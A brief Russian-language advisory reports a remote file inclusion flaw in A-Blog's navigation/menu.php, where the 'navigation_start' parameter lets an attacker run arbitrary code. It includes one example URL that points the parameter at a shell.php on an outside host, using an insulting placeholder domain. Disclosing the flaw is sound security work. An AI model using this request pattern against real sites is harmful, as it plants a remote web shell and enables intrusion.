Программа: A-Blog

Обнаруженная уязвимость может быть использована злоумышленником для выполнения произвольного кода. Уязвимость существует из-за того, что входные данные, передаваемые через параметр "navigation_start" не правильно обрабатываются в menu.php.

Пример:

http://www.site.com/ablog_dir/navigation/menu.php?navigation_start =http://marcusbestlamer.gay/shell.php?



Оставить мнение